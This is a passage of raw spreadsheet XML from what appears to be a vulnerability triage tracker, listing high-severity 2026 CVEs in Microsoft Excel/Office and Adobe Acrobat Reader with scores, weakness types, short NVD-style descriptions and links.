        <v>7.8</v>
      </c>
      <c r="E645" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F645" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G645" s="5" t="inlineStr"/>
      <c r="H645" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I645" s="5" t="inlineStr"/>
      <c r="J645" s="5" t="inlineStr"/>
      <c r="K645" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L645" s="5" t="inlineStr"/>
      <c r="M645" s="5" t="inlineStr"/>
      <c r="N645" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O645" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P645" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q645" s="5" t="inlineStr"/>
      <c r="R645" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S645" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T645" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81948</t>
        </is>
      </c>
    </row>
    <row r="646">
      <c r="A646" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B646" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C646" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81949</t>
        </is>
      </c>
      <c r="D646" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E646" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F646" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G646" s="5" t="inlineStr"/>
      <c r="H646" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I646" s="5" t="inlineStr"/>
      <c r="J646" s="5" t="inlineStr"/>
      <c r="K646" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L646" s="5" t="inlineStr"/>
      <c r="M646" s="5" t="inlineStr"/>
      <c r="N646" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O646" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P646" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q646" s="5" t="inlineStr"/>
      <c r="R646" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S646" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T646" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81949</t>
        </is>
      </c>
    </row>
    <row r="647">
      <c r="A647" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B647" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C647" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81950</t>
        </is>
      </c>
      <c r="D647" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E647" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F647" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G647" s="5" t="inlineStr"/>
      <c r="H647" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I647" s="5" t="inlineStr"/>
      <c r="J647" s="5" t="inlineStr"/>
      <c r="K647" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L647" s="5" t="inlineStr"/>
      <c r="M647" s="5" t="inlineStr"/>
      <c r="N647" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O647" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P647" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q647" s="5" t="inlineStr"/>
      <c r="R647" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="S647" s="5" t="inlineStr">
        <is>
          <t>Double free in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T647" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81950</t>
        </is>
      </c>
    </row>
    <row r="648">
      <c r="A648" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B648" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C648" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81951</t>
        </is>
      </c>
      <c r="D648" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E648" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F648" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G648" s="5" t="inlineStr"/>
      <c r="H648" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I648" s="5" t="inlineStr"/>
      <c r="J648" s="5" t="inlineStr"/>
      <c r="K648" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L648" s="5" t="inlineStr"/>
      <c r="M648" s="5" t="inlineStr"/>
      <c r="N648" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O648" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P648" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q648" s="5" t="inlineStr"/>
      <c r="R648" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S648" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T648" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81951</t>
        </is>
      </c>
    </row>
    <row r="649">
      <c r="A649" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B649" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C649" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81953</t>
        </is>
      </c>
      <c r="D649" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E649" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F649" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G649" s="5" t="inlineStr"/>
      <c r="H649" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I649" s="5" t="inlineStr"/>
      <c r="J649" s="5" t="inlineStr"/>
      <c r="K649" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L649" s="5" t="inlineStr"/>
      <c r="M649" s="5" t="inlineStr"/>
      <c r="N649" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O649" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P649" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q649" s="5" t="inlineStr"/>
      <c r="R649" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S649" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T649" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81953</t>
        </is>
      </c>
    </row>
    <row r="650">
      <c r="A650" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B650" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C650" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81954</t>
        </is>
      </c>
      <c r="D650" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E650" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F650" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G650" s="5" t="inlineStr"/>
      <c r="H650" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I650" s="5" t="inlineStr"/>
      <c r="J650" s="5" t="inlineStr"/>
      <c r="K650" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L650" s="5" t="inlineStr"/>
      <c r="M650" s="5" t="inlineStr"/>
      <c r="N650" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O650" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P650" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q650" s="5" t="inlineStr"/>
      <c r="R650" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S650" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T650" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81954</t>
        </is>
      </c>
    </row>
    <row r="651">
      <c r="A651" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B651" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C651" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81956</t>
        </is>
      </c>
      <c r="D651" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E651" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F651" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G651" s="5" t="inlineStr"/>
      <c r="H651" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I651" s="5" t="inlineStr"/>
      <c r="J651" s="5" t="inlineStr"/>
      <c r="K651" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:office_online_server</t>
        </is>
      </c>
      <c r="L651" s="5" t="inlineStr"/>
      <c r="M651" s="5" t="inlineStr"/>
      <c r="N651" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O651" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P651" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q651" s="5" t="inlineStr"/>
      <c r="R651" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S651" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T651" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81956</t>
        </is>
      </c>
    </row>
    <row r="652">
      <c r="A652" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B652" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C652" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81957</t>
        </is>
      </c>
      <c r="D652" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E652" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F652" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G652" s="5" t="inlineStr"/>
      <c r="H652" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I652" s="5" t="inlineStr"/>
      <c r="J652" s="5" t="inlineStr"/>
      <c r="K652" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L652" s="5" t="inlineStr"/>
      <c r="M652" s="5" t="inlineStr"/>
      <c r="N652" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O652" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P652" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q652" s="5" t="inlineStr"/>
      <c r="R652" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S652" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T652" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81957</t>
        </is>
      </c>
    </row>
    <row r="653">
      <c r="A653" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B653" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C653" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81959</t>
        </is>
      </c>
      <c r="D653" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E653" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F653" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G653" s="5" t="inlineStr"/>
      <c r="H653" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I653" s="5" t="inlineStr"/>
      <c r="J653" s="5" t="inlineStr"/>
      <c r="K653" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L653" s="5" t="inlineStr"/>
      <c r="M653" s="5" t="inlineStr"/>
      <c r="N653" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O653" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P653" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q653" s="5" t="inlineStr"/>
      <c r="R653" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="S653" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T653" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81959</t>
        </is>
      </c>
    </row>
    <row r="654">
      <c r="A654" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B654" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C654" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81960</t>
        </is>
      </c>
      <c r="D654" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E654" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F654" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G654" s="5" t="inlineStr"/>
      <c r="H654" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I654" s="5" t="inlineStr"/>
      <c r="J654" s="5" t="inlineStr"/>
      <c r="K654" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L654" s="5" t="inlineStr"/>
      <c r="M654" s="5" t="inlineStr"/>
      <c r="N654" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O654" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P654" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q654" s="5" t="inlineStr"/>
      <c r="R654" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S654" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T654" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81960</t>
        </is>
      </c>
    </row>
    <row r="655">
      <c r="A655" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B655" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C655" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81973</t>
        </is>
      </c>
      <c r="D655" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E655" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F655" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G655" s="5" t="inlineStr"/>
      <c r="H655" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I655" s="5" t="inlineStr"/>
      <c r="J655" s="5" t="inlineStr"/>
      <c r="K655" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L655" s="5" t="inlineStr"/>
      <c r="M655" s="5" t="inlineStr"/>
      <c r="N655" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O655" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P655" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q655" s="5" t="inlineStr"/>
      <c r="R655" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S655" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="T655" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81973</t>
        </is>
      </c>
    </row>
    <row r="656">
      <c r="A656" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B656" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C656" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81975</t>
        </is>
      </c>
      <c r="D656" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E656" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F656" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G656" s="5" t="inlineStr"/>
      <c r="H656" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I656" s="5" t="inlineStr"/>
      <c r="J656" s="5" t="inlineStr"/>
      <c r="K656" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L656" s="5" t="inlineStr"/>
      <c r="M656" s="5" t="inlineStr"/>
      <c r="N656" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O656" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P656" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q656" s="5" t="inlineStr"/>
      <c r="R656" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S656" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="T656" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81975</t>
        </is>
      </c>
    </row>
    <row r="657">
      <c r="A657" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B657" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C657" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81976</t>
        </is>
      </c>
      <c r="D657" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E657" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F657" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G657" s="5" t="inlineStr"/>
      <c r="H657" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I657" s="5" t="inlineStr"/>
      <c r="J657" s="5" t="inlineStr"/>
      <c r="K657" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L657" s="5" t="inlineStr"/>
      <c r="M657" s="5" t="inlineStr"/>
      <c r="N657" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O657" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P657" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q657" s="5" t="inlineStr"/>
      <c r="R657" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S657" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="T657" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81976</t>
        </is>
      </c>
    </row>
    <row r="658">
      <c r="A658" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B658" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C658" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81979</t>
        </is>
      </c>
      <c r="D658" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E658" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F658" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G658" s="5" t="inlineStr"/>
      <c r="H658" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I658" s="5" t="inlineStr"/>
      <c r="J658" s="5" t="inlineStr"/>
      <c r="K658" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L658" s="5" t="inlineStr"/>
      <c r="M658" s="5" t="inlineStr"/>
      <c r="N658" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O658" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P658" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q658" s="5" t="inlineStr"/>
      <c r="R658" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S658" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="T658" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81979</t>
        </is>
      </c>
    </row>
    <row r="659">
      <c r="A659" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B659" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C659" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81980</t>
        </is>
      </c>
      <c r="D659" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E659" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F659" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G659" s="5" t="inlineStr"/>
      <c r="H659" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I659" s="5" t="inlineStr"/>
      <c r="J659" s="5" t="inlineStr"/>
      <c r="K659" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L659" s="5" t="inlineStr"/>
      <c r="M659" s="5" t="inlineStr"/>
      <c r="N659" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O659" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P659" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q659" s="5" t="inlineStr"/>
      <c r="R659" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S659" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="T659" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81980</t>
        </is>
      </c>
    </row>
    <row r="660">
      <c r="A660" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B660" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C660" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81981</t>
        </is>
      </c>
      <c r="D660" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E660" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F660" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G660" s="5" t="inlineStr"/>
      <c r="H660" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I660" s="5" t="inlineStr"/>
      <c r="J660" s="5" t="inlineStr"/>
      <c r="K660" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L660" s="5" t="inlineStr"/>
      <c r="M660" s="5" t="inlineStr"/>
      <c r="N660" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O660" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P660" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q660" s="5" t="inlineStr"/>
      <c r="R660" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S660" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="T660" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81981</t>
        </is>
      </c>
    </row>
    <row r="661">
      <c r="A661" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B661" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C661" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81983</t>
        </is>
      </c>
